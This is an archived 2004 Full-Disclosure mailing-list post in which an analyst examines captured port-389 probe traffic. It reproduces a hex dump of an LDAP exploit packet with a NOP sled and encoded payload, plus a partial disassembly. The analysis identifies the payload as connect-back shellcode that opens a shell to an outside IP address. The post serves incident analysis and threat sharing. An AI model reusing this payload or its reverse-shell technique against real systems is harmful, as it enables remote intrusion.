lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
From: disclosure at ossecurity.ca (Disclosure From OSSI)
Subject: (no subject)

We grabbed the binary data from the sniff'ed below. After a quick reverse,
it turns out to be a connect-back shellcode with back server p->
24.19.147.225.

Partially disassembled:
00000084 68 18 13 93 E1                          push    0E1931318h
00000089 68 02 00 22 E4                          push    0E4220002h
0000008E 8B CC                                   mov     ecx, esp
00000090 6A 10                                   push    10h
00000092 51                                      push    ecx
00000093 FF 76 24                                push    dword ptr [esi+24h]
00000096 FF D0                                   call    eax

 = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
The following info was automatically generated by "OSAnalyzer" program.
 = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =

      call  eax=776ba5a3
      776ba5a3 = WS2_32.dll!connect with para 3
      Para 0 is socket # 00000094
      Para 1 is name p-> 00dafcc4
      Para 2 is namelen  00000010
      sin_family AF_INET     , port 8932 IP 24.19.147.225
      call external 776ba5a3 stack 0000000c return ffffffff

; =================== a quick translation =================================
C:\TEMP>ping -a 24.19.147.225

Pinging c-24-19-147-225.client.comcast.net [24.19.147.225] with 32 bytes of
data

Hope the info is useful to you.

Regards

Peter Huang
Peter.Huang AT ossecurity.ca
http://www.ossecurity.ca/

> Date: Wed, 25 Feb 2004 08:46:26 -0800
> From: John Sage <jsage@...chhaven.com>
> To: full-disclosure@...ts.netsys.com
> Subject: Re: [Full-Disclosure] Probes on port 389
>
> Just picked this up:
>
> On Tue, Feb 24, 2004 at 11:06:50AM -0600, Schmehl, Paul L wrote:
> > From: "Schmehl, Paul L" <pauls@...allas.edu>
> > To: <intrusion@...s.org>, <full-disclosure@...ts.netsys.com>
> > Subject: [Full-Disclosure] Probes on port 389
> > Date: Tue, 24 Feb 2004 11:06:50 -0600
> >
> > I threw up a quick rule on snort to monitor probes on port 389 because I
> > have been seeing entries in /var/log/messages on some boxes that I am
> > responsible for.  This morning we had a probe that hit 26205 different
> > IPs on that port in about 7 minutes (SYN scan only - no payload.)  The
> > source IP was a mailserver in England.  (They've been notified.)
>
> /* snip */
>
> input: snort.log.1077660886
> filter: ip and ( src host 24.6.176.211 )
> #
> T 2004/02/25 08:08:15.042588 24.6.176.211:220 -> 24.19.147.xxx:389 [S]
> #
> T 2004/02/25 08:08:15.092297 24.6.176.211:220 -> 24.19.147.xxx:389 [R]
> #
> T 2004/02/25 08:08:15.097128 24.6.176.211:2211 -> 24.19.147.xxx:389 [S]
> #
> T 2004/02/25 08:08:15.146174 24.6.176.211:2211 -> 24.19.147.xxx:389 [A]
> #
> T 2004/02/25 08:08:15.154158 24.6.176.211:2211 -> 24.19.147.xxx:389 [A]
>   30 82 0a 3d 02 01 01 60    82 01 36 02 ff ff ff ff    0..=...`..6.....
>   50 a9 f7 00 10 13 90 90    90 90 90 90 90 90 90 90    P...............
>   90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
>   90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
>   90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
>   90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
>   90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
>   90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
>   90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
>   90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
>   90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
>   90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
>   90 90 90 90 90 90 90 90    90 eb 02 eb 05 e8 f9 ff    ................
>   ff ff 5b 80 c3 10 33 c9    66 b9 33 01 80 33 95 43    ..[...3.f.3..3.C
>   e2 fa 14 79 05 94 95 95    1e 61 c0 c3 f1 34 a5 95    ...y.....a...4..
>   95 95 1e d5 99 1e e5 89    38 1e fd 9d 7e 95 1e 50    ........8...~..P
>   cb c8 1c 93 6a a3 fd 1b    db 9b 79 7d 38 95 95 95    ....j.....y}8...
>   fd a6 a7 95 95 fd e2 e6    a7 ca c1 6a 45 1e 6d c2    ...........jE.m.
>   fd 4c 9c 60 38 7d 06 95    95 95 a6 5c c4 c4 c4 c4    .L.`8}.....\....
>   d4 c4 d4 c4 6a 45 1c d3    b1 c2 fd 79 6c 3f f5 7d    ....jE.....yl?.}
>   ec 95 95 95 fd 8d 86 06    74 fd 97 95 b7 71 1e 59    ........t....q.Y
>   ff 85 c4 6a e3 b1 6a 45    fd f6 f8 f1 95 1c f3 a5    ...j..jE........
>   6a a3 fd e7 6b 26 83 7d    c4 95 95 95 1c d3 8b 16    j...k&.}........
>   79 c1 18 a9 b1 a6 55 a6    5c 16 54 80 3e 77 68 53    y.....U.\.T.>whS
>   d1 b1 85 d1 6b d1 b1 a8    6b d1 b1 a9 1e d3 b1 1c    ....k...k.......
>   d1 b1 dd 1c d1 b1 d9 1c    d1 b1 c5 18 d1 b1 85 c1    ................
>   c5 c4 c4 c4 ff 94 c4 c4    6a e3 a5 c4 6a c3 8b 6a    ........j...j..j
>   a3 fd 7a 5b 75 f5 7d 97    95 95 95 6a 45 c6 c0 c3    ..z[u.}....jE...
>   c2 1e f9 b1 8d 1e d0 a9    1e c1 90 ed 96 40 1e df    .............@..
>   8d 1e cf b5 96 48 76 a7    dc 1e a1 1e 96 60 a6 6a    .....Hv......`.j
>   69 a6 55 39 af 51 e1 92    54 5a 98 96 6d 7e 67 ae    i.U9.Q..TZ..m~g.
>   e9 b1 81 e0 74 1e cf b1    96 48 f3 1e 99 de 1e cf    ....t....H......
>   89 96 48 1e 91 1e 96 50    7e 97 a6 55 1e 40 ca cb    ..H....P~..U.@..
>   c8 ce 57 91 95 90 90 90    90 90 90 90 90 90 90 90    ..W.............

... deleted ...

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ